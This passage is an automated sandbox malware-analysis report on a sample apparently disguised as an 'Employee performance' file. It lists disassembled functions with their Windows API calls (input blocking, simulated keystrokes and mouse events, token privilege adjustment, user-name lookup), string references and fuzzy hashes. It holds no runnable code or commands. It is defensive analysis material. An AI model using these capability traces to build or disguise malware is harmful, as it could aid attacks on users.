Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6685a54fedf5f2e0fd73911b7d918dd6e068f3e98fa515b8ef98c9572a659bec
Instruction ID: d282448011c609ac5500226286ed6c9a9df300e199acfe9ba5d70c70ea3946fe
Opcode Fuzzy Hash: 6685a54fedf5f2e0fd73911b7d918dd6e068f3e98fa515b8ef98c9572a659bec
Instruction Fuzzy Hash: 34F0177195030DBBEF00DFE4DA89EAEBBBCFB08604F5045A5F541E2181E775AA449B50

Function 00FF4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000,?,010028E9), ref: 00FF4D09
TerminateProcess.KERNEL32(00000000,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000,?,010028E9), ref: 00FF4D10
ExitProcess.KERNEL32 ref: 00FF4D22

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d583b95afa7975b521004411a0061bb8632b6ec4b028626c8c94a5c0039d040
Instruction ID: dd3bd8d5f315e177d6ac8e20d6974adf0ad38c3c727fa31433ea9090adfb0977
Opcode Fuzzy Hash: 3d583b95afa7975b521004411a0061bb8632b6ec4b028626c8c94a5c0039d040
Instruction Fuzzy Hash: E4E0BF31400149AFEF216F54DE09A593F69FF45751F104014FD958A236DB3AED41DB40

Function 0100C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0100C36C

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a82b4da61ed00662b536df6e65aec62de1749ee2cb89ced086d38fde62e2420e
Instruction ID: 524ee4fbb62a5ccba80d139463b8f1b217860b695c3eabb46c1c5b33e68403b0
Opcode Fuzzy Hash: a82b4da61ed00662b536df6e65aec62de1749ee2cb89ced086d38fde62e2420e
Instruction Fuzzy Hash: 15412872900219ABFB219FB9DD48EBB77B8EB84314F1042E9F945D71C0E6719E418B50

Function 0102D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0102D28C

Strings

X64, xrefs: 0102D2A8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 5f94aea65c0b685a248f10e8288d9915435c0d418f71aaff50318ace63582436
Instruction ID: 59a85cd1df27af151765ae17e854bbb383f90df89072e7b44d204ffd8565e3d5
Opcode Fuzzy Hash: 5f94aea65c0b685a248f10e8288d9915435c0d418f71aaff50318ace63582436
Instruction Fuzzy Hash: E9D0C9B580112DEADB90CA90D888DDDB37CBB15305F000151F146A2000D73495488F20

Function 00FFCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 4ccd1399953d85e68ea14bdf8b2d6f38a22597120b58525ae0aca02e08702fef
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 28023D72E0012D9BDF14CFA9C9806ADFBF1EF88324F254169DA19E7394D731A941DB90

Function 010468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 01046918
FindClose.KERNEL32(00000000), ref: 01046961

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 33f6bc739d6e0e6040e88bd3cf443cc8c522db5d483faa0318e622abebe544f5
Instruction ID: bf955dceeef3292fb1fcfb25510a8fff74e69a5a633faee7a4625c2f320c9eb8
Opcode Fuzzy Hash: 33f6bc739d6e0e6040e88bd3cf443cc8c522db5d483faa0318e622abebe544f5
Instruction Fuzzy Hash: 9311D3756042019FD710DF29D4C4A16BBE5FF85328F08C6A9E8A98F3A2D775EC05CB91

Function 010437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01054891,?,?,00000035,?), ref: 010437E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01054891,?,?,00000035,?), ref: 010437F4

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 86c2e27cee6cfdecd89f24863a318f6c7161f90904989d33d39595d166f991c1
Instruction ID: 37e316932e0f150dfc82f71920b8bb106174abebf1a071f8fdeb886f7b6a3530
Opcode Fuzzy Hash: 86c2e27cee6cfdecd89f24863a318f6c7161f90904989d33d39595d166f991c1
Instruction Fuzzy Hash: 53F0E5B06052392BE77056B68C8DFEB3AAEFFC4761F0001B5F589D2285D9609904C7B0

Function 0103B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0103B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0103B270

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 58e7e495833f451f595b6e69007f24fa3fbd01c813750e9a5f15e952e3591158
Instruction ID: 109d915899253d661e65cb9c25f1823e78611c1380bbf9237e9071a817a73bc7
Opcode Fuzzy Hash: 58e7e495833f451f595b6e69007f24fa3fbd01c813750e9a5f15e952e3591158
Instruction Fuzzy Hash: 4BF01D7180428DABEB159FA5C806BAE7FB4FF04309F00804AF9A5A5192C77D82119F94

Function 010310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010311FC), ref: 010310D4
CloseHandle.KERNEL32(?,?,010311FC), ref: 010310E9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 46a22f8db5bc0a47805e0e9410e9f711df502f7bf0e2d90f721253b3c690c019
Instruction ID: 30ede0a4d6451eaf9f9fec9155c1929e1377e5ca66c3c1f399178656af0fa2bb
Opcode Fuzzy Hash: 46a22f8db5bc0a47805e0e9410e9f711df502f7bf0e2d90f721253b3c690c019
Instruction Fuzzy Hash: 6BE04F32008650AEF7352B12FC05E777BE9EB04310B10882EF5E5804B5DB666C90EB10

Function 00FDCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 01020C40

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: a7ab2715577ffda52bd982f53ab0b9586634b46846ef5cd1787d72a32b2d490e
Instruction ID: 4a5577ef427f9febae2b49f1e80bb5e10da1266156668357bba5ea86bbf3da2f
Opcode Fuzzy Hash: a7ab2715577ffda52bd982f53ab0b9586634b46846ef5cd1787d72a32b2d490e
Instruction Fuzzy Hash: EF32AE71900219DBDF14DF94CC80BEDB7B6FF04304F18809AE846AB396D775AA45EBA0

Function 0100676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,01006766,?,?,00000008,?,?,0100FEFE,00000000), ref: 01006998

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c97c5bbbb96ba30ff39b352161982393451a679cf4c731aebb2414e4727daaab
Instruction ID: 99526bc5fcd4f79117a5c95f39e5193694568e23f0510e5416f9ba47d5fcf900
Opcode Fuzzy Hash: c97c5bbbb96ba30ff39b352161982393451a679cf4c731aebb2414e4727daaab
Instruction Fuzzy Hash: 84B127715106088FE756CF28C486BA57BE1FB45364F258698E9D9CF2E2C336DAA1CB40

Function 00FEB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0102851F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 71776bdce07a31d2ea9ba8e4498756646a99d2076ecad04391e8e292dd1b230f
Instruction ID: 7db1adb3b5331bb495decdfa863fe0bc1e92d8dd02ec9553e9aa346f8f2e8c75
Opcode Fuzzy Hash: 71776bdce07a31d2ea9ba8e4498756646a99d2076ecad04391e8e292dd1b230f
Instruction Fuzzy Hash: C1126D75E002299FDB64CF59C8807EEB7F5FF48310F1481AAE849EB255E7349A81DB90

Function 0104EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0104EABD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 54025ea59407de34651efe8f09bfcdfb05e8182cc7e32413509749a45a110a39
Instruction ID: 4d1aac7f34563379c58b5edebf32929b05adc75eea9791c17a8f02b0563446dc
Opcode Fuzzy Hash: 54025ea59407de34651efe8f09bfcdfb05e8182cc7e32413509749a45a110a39
Instruction Fuzzy Hash: 5CE01A752002059FD710EF59D844E9AB7E9BF98760F048426FD89C7361DA78B8408BA0

Function 0103E355 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0103E37E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: bea9f07d9111ced970e9fef2ae11e3f770ce8fed831e919e95e78262694d6245
Instruction ID: f5bb6715def672c96469aac6b50a97fd8419349b1a6def3e97f7b910dbfd277d
Opcode Fuzzy Hash: bea9f07d9111ced970e9fef2ae11e3f770ce8fed831e919e95e78262694d6245
Instruction Fuzzy Hash: 71D05EF21902017DFABD0A3CCE2FF7A298CE381580F40D789B2C189599DA91A4444021

Function 00FF09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00FF03EE), ref: 00FF09DA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ba17940a342e1df17bcee826ae40dc776b804be279516fb59e6b21fe1a91d5d6
Instruction ID: 1f02813f8fd5385b5077cc27e466e65b2bec5508b0c3db8b4cf9d54d2827a163
Opcode Fuzzy Hash: ba17940a342e1df17bcee826ae40dc776b804be279516fb59e6b21fe1a91d5d6
Instruction Fuzzy Hash:

Function 00FF781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00FF798B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 5544599811cfa79770dc1e8201303a8d8bad75a87c85acc80163a15476ae8a42
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: DB514862E0C70D56DB38796888997BFE3959F123E0F280509DB82C72B2C659DE06F355

Function 01006DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2e3f57e5c1641b8acfce6e048a3178e8d20b868e7bfa4eb4b9f88fc87ae372
Instruction ID: 24b8b2a91277d4fcbdafa379be8684007cdff0da658c5e8c0854939043b5d9c9
Opcode Fuzzy Hash: 1a2e3f57e5c1641b8acfce6e048a3178e8d20b868e7bfa4eb4b9f88fc87ae372
Instruction Fuzzy Hash: 5C323431D29F414DE7639538C822335B689AFB73C5F15C737E89AB599AEB2ED4834200

Function 00FECC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a607b19cbd2964af8c784064f45735b2c5a98ba77ab0c8923dcec083d23ef3
Instruction ID: 70b038e4bef0bc05348cef1d8273fb8f30093a7e613815df0eacb75598c94ab8
Opcode Fuzzy Hash: 72a607b19cbd2964af8c784064f45735b2c5a98ba77ab0c8923dcec083d23ef3
Instruction Fuzzy Hash: 2C321A31A001E58BFF34CE2DC694A7D7BE1FB45314F2881A6E6D9DB291D234D982DB41

Function 00FD7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a977db2be59df2956d6720fdc768725187a9700be6d6f970d6fe7f4101072e4f
Instruction ID: 317fde71dcc11131a820f6772c7c8e0207fac548c400601210bd9a2ae7617dbd
Opcode Fuzzy Hash: a977db2be59df2956d6720fdc768725187a9700be6d6f970d6fe7f4101072e4f
Instruction Fuzzy Hash: A622C270A042099FDF14DF64DC41AAEB7F6FF85300F14462AE852AB395EB3AA914DB50

Function 00FD91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d68440c4143965ef8fb0c5a7d075c39bec8a0387f2d9ae887090603cccf1c334
Instruction ID: 0faa497818f2ef4ab7d635ebafa68bba130f5ed522d46faccb1d57dcc2515940
Opcode Fuzzy Hash: d68440c4143965ef8fb0c5a7d075c39bec8a0387f2d9ae887090603cccf1c334
Instruction Fuzzy Hash: A70208B1E00209EBDB05DF64DC81AAEBBB1FF44300F548165E846DB395EB79E910DB90

Function 00FF1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: f2098679692de4a8190f33a787f3f96a71c518a4a0d481fe43ea04d2bc8a21d6
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: D4918733A080A78ADB29463A857417EFFF16E923B131A079DD5F2CA1E5FE10D954F620

Function 00FF19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

